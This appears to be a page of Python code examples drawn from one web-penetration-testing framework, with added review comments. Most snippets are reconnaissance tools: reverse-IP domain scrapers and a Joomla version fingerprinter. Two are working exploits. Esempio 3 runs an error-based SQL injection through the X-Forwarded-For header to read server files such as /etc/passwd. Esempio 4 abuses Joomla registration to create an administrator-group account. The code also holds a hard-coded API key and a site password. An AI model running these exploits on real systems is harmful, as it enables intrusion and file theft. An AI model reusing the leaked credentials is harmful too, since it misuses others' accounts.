Esempio n. 1
 def Whoiswebhosting(self, searcher):
     """Collect domains reported for ``self.ip`` by whois.webhosting.info.

     ``searcher['URL']`` is a format string taking (ip, page number) and
     ``searcher['SITE']`` labels the source in the status line. Every page
     is scraped with the same table-cell regex; the collected names are
     appended to ``self.domains``.
     """
     client = HTTP(searcher['URL'])
     domain_re = r'<td><a href="http:\/\/whois\.webhosting\.info\/.*?\.">(.*?)\.<\/a><\/td>'
     last_page_re = r'\?pi=([0-9]+)\&ob=SLD\&oo=DESC">\&nbsp\;\&nbsp\;Last\&nbsp\;&gt;\&gt\;<\/a>'
     captcha_marker = 'The security key helps us prevent automated searches'

     page_html = client.Request(searcher['URL'] % (self.ip, 1))
     collected = list(findall(domain_re, page_html))
     last_link = search(last_page_re, page_html)
     if last_link:
         last_index = int(last_link.group(1))
         # Pages 2 .. last_index-1; the upper bound is exclusive, as before.
         for page_no in range(2, last_index):
             page_html = client.Request(searcher['URL'] % (self.ip, page_no))
             # The site answers rapid paging with a CAPTCHA page; stop there.
             if search(captcha_marker, page_html):
                 break
             collected.extend(findall(domain_re, page_html))
     self.frmwk.print_status(
         self.fmt_string.format(searcher['SITE'], len(collected)))
     self.domains += collected
Esempio n. 2
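 def BingApi(self, searcher):
     """Collect host names that the (legacy) Bing search API lists for ``self.ip``.

     ``searcher['URL']`` is a format string taking (api key, ip, page offset);
     ``searcher['SITE']`` labels the source in the status line. Host names are
     cut out of every ``<web:Url>`` element and appended to ``self.domains``.
     A response without ``<web:Total>`` used to raise AttributeError; now only
     the first page is parsed in that case.
     """
     # NOTE(review): an API key committed in source. Treat it as exposed,
     # rotate it, and load it from the framework's config instead.
     KEY = "49EB4B94127F7C7836C96DEB3F2CD8A6D12BDB71"
     req = HTTP(searcher['URL'])
     pages = [req.Request(searcher['URL'] % (KEY, self.ip, 0))]
     total = search(r'<web:Total>([0-9]+)<\/web:Total>', pages[0])
     if total:
         # The API pages 50 results at a time; offset 0 was fetched above.
         page_count = int(int(total.group(1)) / 50 + 1)
         for offset in range(1, page_count):
             pages.append(req.Request(searcher['URL'] % (KEY, self.ip, offset)))
     result = findall(r'<web:Url>(.+?)<\/web:Url>', ''.join(pages))
     # 'http://host/path' -> 'host'
     urls = [url.split('/', 3)[2] for url in result]
     self.frmwk.print_status(
         self.fmt_string.format(searcher['SITE'], len(urls)))
     self.domains += urls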
Esempio n. 3
class Module(Templates):
	"""Error-based SQL injection probe carried in the X-Forwarded-For header.

	NOTE(review): ``description`` / ``detailed_description`` below talk about
	"meter information" and do not describe what ``run`` does; they look
	copied from another module and should be rewritten.
	"""
	def __init__(self, *args, **kwargs):
		super().__init__(*args, **kwargs)
		self.version		= 1
		self.author			= [ 'Kid' ]
		self.description 	= 'Get Basic Meter Information By Reading Tables'
		self.detailed_description	= 'This module retreives some basic meter information and displays it in a human-readable way.'
		
		# FILE is interpolated into the payload in run(); the default reads /etc/passwd.
		self.options.addString('FILE', 'domain/ip', default = '/etc/passwd')

	def run(self, frmwk, args):
		"""Read ``FILE`` from the target database host, 62 characters per request.

		The target URL is hard-coded below (``self.options['URL']`` is never
		consulted — presumably a placeholder left from testing). ``frmwk`` and
		``args`` are unused. Leaked chunks are written straight to stdout;
		nothing is returned.
		"""
		url = 'http://www.google.com/'
		self.victim		= HTTP(url)
		len = 1  # character offset into FILE (shadows the builtin ``len``)
		# join	= ''
		while True:
			# The injection travels in X-Forwarded-For, so an application that
			# logs or stores that header unescaped is the exposure. Defensive
			# note: a client-supplied header containing ORDER BY / LOAD_FILE /
			# information_schema is a high-signal WAF and log indicator.
			header = {'x-forwarded-for': "1' order by (SELECT 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(LOAD_FILE('%s'))),%s,62)))a from information_schema.tables group by a)b);-- -'" % (self.options['FILE'], len)}
			data = self.victim.Request(url, 'POST', "uname=administrator&upass=12345612345&Submit=+++Login+++",header = header)
			# print(data)
			# The chunk is read out of the reflected MySQL "Duplicate entry" error.
			res = search("Duplicate entry '.(.*?)' for key ", data, DOTALL)
			if res:
				# join += res.group(1)
				stdout.write(res.group(1))
				stdout.flush()
			else:
				break  # no further chunk, or the error is not reflected
			len += 62  # advance the substring window; matches the 62 in the payload
		# print('--------------data---------- : \n' + join)
Esempio n. 4
	def run(self, frmwk, args):
		"""Register an account on the Joomla site at ``self.options['URL']``.

		Steps, mirrored by the status lines: fetch the registration page and
		pick up its 32-character form token; post one fixed registration
		(``exploit``) whose response is discarded — presumably to prime the
		session; post the real one (``registry``) with the generated
		username/password and the mail account from ``CONFIG.GMAIL_ACCOUNT``;
		then wait 30 s, scan ``self.getMail()`` (defined elsewhere) for an
		activation link and follow it. ``args`` is unused.

		NOTE(review): ``active_link`` is only bound inside the ``if active:``
		branch; when no mail matches, ``if active_link:`` below raises
		NameError instead of reporting the missing activation mail.
		NOTE(review): the regex literals use ``\s`` in non-raw strings, which
		newer Pythons flag as an invalid escape; prefer ``r'...'``.
		"""
		url 				= self.options['URL']
		email 				= CONFIG.GMAIL_ACCOUNT[0]
		self.username		= '******' + str(randint(1000,100000))
		self.password 		= '******'
		victim				= HTTP(url)
		victim.storecookie	= True  # keep the cookies the site sets across requests
		exploit				= 'jform%5Bname%5D=exploit&jform%5Busername%5D=exploit&jform%5Bpassword1%5D=123123&jform%5Bpassword2%5D=1231233&jform%5Bemail1%5D=pentest%40yahoo.com&jform%5Bemail2%5D=pentest%40yahoo.com&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'
		registry			= 'jform%5Bname%5D={0}&jform%5Busername%5D={0}&jform%5Bpassword1%5D={1}&jform%5Bpassword2%5D={1}&jform%5Bemail1%5D={2}&jform%5Bemail2%5D={2}&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'.format(self.username, self.password, email)
		
		frmwk.print_status('Init token')
		data	= victim.Request(url)
		# Joomla-style form token: a 32-char alphanumeric input with value="1".
		token	= search('name="([a-zA-Z0-9]{32})"\svalue="1"', data)
		if token:
			token	= token.group(1)
		else:
			token	= ''  # continue without a token; the site may still reject the post
		frmwk.print_status('Send false request')
		url	= url + '?task=registration.register'
		victim.Request(url, 'POST', exploit + token + '=1')
		frmwk.print_status('Send exploit request')
		data	= victim.Request(url, 'POST', registry + token + '=1')

		# Joomla renders failures as "warning message" and successes as
		# "message message" definition entries.
		warning	= search('class="warning\smessage">(.*?)</dd>', data, DOTALL)
		message	= search('class="message\smessage">(.*?)</dd>', data, DOTALL)
		if warning:
			frmwk.print_error('Error during exploit : ' + warning.group(1))
			return
		elif message:
			frmwk.print_success('Successful : ' + message.group(1).strip())
			frmwk.print_success('Account login: %s | %s' % (self.username, self.password))
		else:
			frmwk.print_status('Hên xui !')  # Vietnamese: "it's a gamble" — outcome unknown
		
		frmwk.print_status('Sleep 30s for mail receiver !')
		sleep(30)
		for email in self.getMail():
			# first mail whose body carries an "activate&token=" URL wins
			active	= search('(http(.*?)activate&token=(.*?))\s', email['body'], DOTALL)
			if active:
				active_link	= active.group(1)
				frmwk.print_status('Active link: ' + active_link)
				break
		if active_link:
			data	= victim.Request(active_link)
			message	= search('class="message\smessage">(.*?)</dd>', data, DOTALL)
			if message:
				frmwk.print_success('Actived Account: %s | %s' % (self.username, self.password))
Esempio n. 5
 def eWhois(self, searcher):
     """Collect domains on ``self.ip`` from ewhois.com's per-IP export.

     Logs in first (``storecookie`` keeps whatever cookies the login sets),
     then fetches the export page for the IP and appends the matched names
     to ``self.domains``. ``searcher['SITE']`` labels the source in the
     status line.
     """
     # NOTE(review): account credentials are committed in source; they
     # belong in the framework's config, and this pair should be rotated.
     login_form = urlencode({
         '_method': 'POST',
         'data[User][email]': '*****@*****.**',
         'data[User][password]': 'RitX:::R1tX',
         'data[User][remember_me]': '0'
     })
     client = HTTP("http://www.ewhois.com/")
     client.storecookie = True
     client.rand_useragent = False
     # The login response body is not used; only the session it establishes.
     client.Request('http://www.ewhois.com/login/', 'POST', login_form)
     export = client.Request("http://www.ewhois.com/export/ip-address/%s/" %
                             self.ip)
     # NOTE(review): the bracketed part is a character class, not a group,
     # so it may not match what was intended — verify against a sample export.
     found = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', export)
     self.frmwk.print_status(
         self.fmt_string.format(searcher['SITE'], len(found)))
     self.domains += found
Esempio n. 6
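 def reverseip(self, searcher):
     """Run one reverse-IP lookup described by ``searcher`` and collect its domains.

     Keys of ``searcher`` used here:
       URL   -- format string taking ``self.ip`` (GET), or the POST endpoint
       DATA  -- optional POST body, a format string taking ``self.ip``
       REGEX -- pattern whose matches in the response are the domains
       SITE  -- label for the status line
       SP    -- optional callable; when present it replaces the generic
                flow above and receives ``searcher`` itself.
     Failures are reported through ``self.frmwk.print_error`` instead of
     being swallowed, so a broken searcher no longer fails silently.
     """
     try:
         if 'SP' in searcher:
             searcher['SP'](searcher)
             return
         req = HTTP(searcher['URL'])
         if 'DATA' in searcher:
             data = req.Request(searcher['URL'], 'POST',
                                searcher['DATA'] % self.ip)
         else:
             data = req.Request(searcher['URL'] % self.ip)
         urls = findall(searcher['REGEX'], data)
         self.frmwk.print_status(
             self.fmt_string.format(searcher['SITE'], len(urls)))
         self.domains += urls
     except Exception as e:
         # Best-effort: one failing searcher must not abort the others,
         # but the failure should at least be visible.
         site = searcher['SITE'] if 'SITE' in searcher else '?'
         self.frmwk.print_error('%s : %s' % (site, e))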
Esempio n. 7
class Searcher(Thread):
    """Threaded, paged search against one host.

    Subclasses supply ``uriCreater``, ``Has_Next``, ``Getdata`` and
    ``Spliter`` (none are defined here). Parsed records accumulate in
    ``self.info``.
    """

    def __init__(self, host, keyworld, limit, delay):
        super().__init__()
        self.keyworld = quote_plus(keyworld)  # URL-encoded search term
        self.limit = limit                    # stop once count reaches this
        self.delay = delay                    # seconds slept between pages
        self.request = HTTP(host, CONFIG.TIME_OUT, user_agents_type='bot')
        self.count = 0                        # paging offset
        self.info = []                        # parsed records so far
        self.step = 10                        # offset increment; reset by do_split

    def run(self):
        """Page through results until no next page, the limit, or an early stop."""
        while True:
            printer.print_line('\t{0:<25} {1:d}'.format(self.name, self.count))
            page = self.do_search(self.uriCreater())
            if not self.Has_Next(page):
                break
            # NOTE(review): count starts at 0, so this stops after the first
            # page unless a subclass hook advances count — confirm intent.
            if self.count <= 1:
                break
            self.count += self.step
            if self.count >= self.limit:
                break
            sleep(self.delay)

    def do_search(self, uri):
        """Fetch ``uri``, parse it and return the raw page ('' when parsing fails)."""
        page = self.request.Request(uri)
        if page == '':
            return page
        try:
            records = self.Getdata(page)
        except Exception:
            printer.print_error('%s : Nothing to do !' % self.name)
            return ''
        self.do_split(records)
        return page

    def do_split(self, info):
        """Run ``Spliter`` on each record, keep those that parse, and set ``step``."""
        parsed = []
        for raw in info:
            try:
                parsed.append(self.Spliter(raw.strip()))
            except Exception as err:
                printer.print_error('%s Error : %s\ncontent: %s' %
                                    (self.name, err, raw))
        self.info += parsed
        self.step = len(parsed)
Esempio n. 8
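    def run(self, frmwk, args):
        """Fingerprint the Joomla version behind ``self.options['URL']``.

        Two strategies, in order: (1) fetch well-known files and look for
        revision strings that pin a version range; (2) when that finds
        nothing, read ``<version>`` out of the en-GB language manifest or the
        com_mailto manifest. The result lands in ``self.version`` (None when
        nothing matched) and is reported through ``frmwk``. ``args`` is
        unused.
        """
        self.version = None
        url = self.options['URL']
        if not url.endswith('/'):
            url += '/'
        ###### dict from http://www.pepelux.org/programs/joomlascan/ #######
        # Each entry: [relative path, [[marker string, version range], ...]].
        # Marker order matters: the first marker found in the file wins.
        storeversion = [
            [
                'language/en-GB/en-GB.ini',
                [[
                    'version 1.5.x 2005-10-30 14:10:00',
                    '1.5.0.Beta-1.5.0.Beta'
                ], ['9913 2008-01-09 21:28:35Z', '1.5.0.Stable-1.5.0.Stable'],
                 ['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'],
                 ['10053 2008-02-21 18:57:54Z', '1.5.2.Stable-1.5.2.Stable'],
                 ['10208 2008-04-17 16:43:15Z', '1.5.3.Stable'],
                 ['10498 2008-07-04 00:05:36Z', '1.5.4.Stable-1.5.7.Stable'],
                 ['11214 2008-10-26 01:29:04Z', '1.5.8.Stable-1.5.8.Stable'],
                 ['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.11.Stable'],
                 [
                     'Copyright (C) 2005 - 2010 Open Source Matters',
                     '1.5.16.Stable-1.5.20.Stable'
                 ],
                 ['Problem with Joomla site', '1.5.17.Stable-1.5.17.Stable'],
                 ['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'],
                 ['17420 2010-05-31 11:14:10Z', '1.6.0.Beta2-1.6.0.Beta2'],
                 ['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'],
                 ['17903 2010-06-28 01:52:11Z', '1.6.0.Beta4-1.6.0.Beta4'],
                 ['18082 2010-07-12 01:02:52Z', '1.6.0.Beta5-1.6.0.Beta5'],
                 ['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta8'],
                 ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'],
                 ['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.7.5.Stable']]
            ],
            [
                'components/com_contact/metadata.xml',
                [['8178 2007-07-23 05:39:47Z', '1.5.0.RC2-1.5.18.Stable'],
                 ['17437 2010-06-01 14:35:04Z', '1.5.19.Stable-1.5.20.Stable'],
                 ['16235 2010-04-20 04:13:25Z', '1.6.0.Stable-1.7.5.Stable']]
            ],
            [
                'htaccess.txt',
                [['47 2005-09-15 02:55:27Z', '1.0.0-1.0.2'],
                 ['423 2005-10-09 18:23:50Z', '1.0.3-1.0.3'],
                 ['1005 2005-11-13 17:33:59Z', '1.0.4-1.0.5'],
                 ['1570 2005-12-29 05:53:33Z', '1.0.6-1.0.7'],
                 ['2368 2006-02-14 17:40:02Z', '1.0.8-1.0.9'],
                 ['4085 2006-06-21 16:03:54Z', '1.0.10-1.0.10'],
                 ['4756 2006-08-25 16:07:11Z', '1.0.11-1.0.11'],
                 ['5973 2006-12-11 01:26:33Z', '1.0.12-1.0.12'],
                 ['5975 2006-12-11 01:26:33Z', '1.0.13-1.0.14.RC1'],
                 ['9317 2007-11-07 03:02:08Z', '1.5.0.RC4-1.5.0.Stable'],
                 ['10492 2008-07-02 06:38:28Z', '1.5.0.Beta-1.5.14.Stable'],
                 ['13415 2009-11-03 15:53:25Z', '1.5.15.Stable-1.5.15.Stable'],
                 ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
                 ['14276 2010-01-18 14:20:28Z', '1.6.0.Beta1-1.6.0.Beta8'],
                 ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'],
                 ['21101 2011-04-07 15:47:33Z', '1.6.2.Stable-1.7.5.Stable']]
            ],
            [
                'administrator/language/en-GB/en-GB.ini',
                [[
                    'version 1.5.x 2005-10-30 14:10:00',
                    '1.5.0.Beta-1.5.0.Beta'
                ], ['9869 2008-01-05 04:00:13Z', '1.5.0.Stable-1.5.0.Stable'],
                 ['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'],
                 ['10122 2008-03-10 11:58:27Z', '1.5.2.Stable-1.5.2.Stable'],
                 ['10186 2008-04-02 13:10:12Z', '1.5.3.Stable-1.5.3.Stable'],
                 ['10500 2008-07-04 06:57:07Z', '1.5.4.Stable-1.5.4.Stable'],
                 ['10571 2008-07-21 01:27:35Z', '1.5.5.Stable-1.5.7.Stable'],
                 ['11213 2008-10-25 12:43:11Z', '1.5.8.Stable-1.5.8.Stable'],
                 ['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.9.Stable'],
                 ['11667 2009-03-08 20:32:38Z', '1.5.10.Stable-1.5.10.Stable'],
                 ['11799 2009-05-06 02:15:50Z', '1.5.11.Stable-1.5.11.Stable'],
                 ['12308 2009-06-23 04:05:28Z', '1.5.12.Stable-1.5.14.Stable'],
                 ['13243 2009-10-20 04:01:04Z', '1.5.15.Stable-1.5.15.Stable'],
                 ['16380 2010-04-23 09:19:48Z', '1.5.16.Stable-1.5.20.Stable'],
                 ['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'],
                 ['17387 2010-05-30 16:28:20Z', '1.6.0.Beta2-1.6.0.Beta2'],
                 ['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'],
                 ['17898 2010-06-27 13:03:01Z', '1.6.0.Beta4-1.6.0.Beta4'],
                 ['18090 2010-07-12 10:49:58Z', '1.6.0.Beta5-1.6.0.Beta5'],
                 ['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta6'],
                 ['18378 2010-08-09 17:29:44Z', '1.6.0.Beta7-1.6.0.Beta7'],
                 ['18572 2010-08-22 09:57:58Z', '1.6.0.Beta8-1.6.0.Beta8'],
                 ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.0.Stable'],
                 ['20899 2011-03-07 20:56:09Z', '1.6.1.Stable-1.6.1.Stable'],
                 ['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.6.6.Stable'],
                 ['21721 2011-07-01 08:48:47Z', '1.7.0.Stable-1.7.2.Stable'],
                 ['22370 2011-11-09 16:18:06Z', '1.7.3.Stable-1.7.5.Stable']]
            ],
            [
                'language/en-GB/en-GB.com_media.ini',
                [['10496 2008-07-03 07:08:39Z', '1.5.0.Beta-1.5.12.Stable'],
                 ['12540 2009-07-22 17:34:44Z', '1.5.13.Stable-1.5.14.Stable'],
                 ['13311 2009-10-24 04:13:49Z', '1.5.15.Stable-1.5.15.Stable'],
                 ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
                 ['17044 2010-05-14 09:52:50Z', '1.6.0.Beta1-1.6.0.Beta3'],
                 ['17769 2010-06-20 01:50:48Z', '1.6.0.Beta4-1.6.0.Beta8'],
                 ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.6.Stable'],
                 ['21660 2011-06-23 13:25:32Z', '1.7.0.Stable-1.7.0.Stable'],
                 ['21948 2011-08-08 16:02:50Z', '1.7.1.Stable-1.7.5.Stable']]
            ],
            [
                'configuration.php-dist',
                [['47 2005-09-15 02:55:27Z', '1.0.0-1.0.0'],
                 ['217 2005-09-21 15:15:58Z', '1.0.1-1.0.2'],
                 ['506 2005-10-13 05:49:24Z', '1.0.3-1.0.7'],
                 ['2622 2006-02-26 04:16:09Z', '1.0.8-1.0.8'],
                 ['3754 2006-05-31 12:08:37Z', '1.0.9-1.0.10'],
                 ['4802 2006-08-28 16:18:33Z', '1.0.11-1.0.12'],
                 ['7424 2007-05-17 15:56:10Z', '1.0.13-1.0.15'],
                 ['9991 2008-02-05 22:13:22Z', '1.5.0.Stable-1.5.8.Stable'],
                 ['11409 2009-01-10 02:27:08Z', '1.5.9.Stable-1.5.9.Stable'],
                 ['11687 2009-03-11 17:49:23Z', '1.5.10.Stable-1.5.15.Stable'],
                 ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable']]
            ]
        ]
        # Manifests carrying an explicit <version> tag; only consulted when
        # the marker table above gave nothing.
        manifests = [
            'language/en-GB/en-GB.xml',
            'components/com_mailto/mailto.xml',
        ]
        requester = HTTP(url)

        for path, markers in storeversion:
            frmwk.print_status('Checking: ' + url + path)
            data = requester.Request(url + path)
            if requester.response.status == 200:
                for marker, version_range in markers:
                    if marker in data:
                        self.version = version_range
                        break
            if self.version:
                break

        for path in manifests:
            if self.version:
                break
            frmwk.print_status('Checking: ' + url + path)
            data = requester.Request(url + path)
            if requester.response.status == 200:
                found = search(r'<version>(.*?)</version>', data)
                if found:
                    self.version = found.group(1)

        if self.version:
            frmwk.print_success('Found version: ' + self.version)
        else:
            frmwk.print_error('Unknown version !')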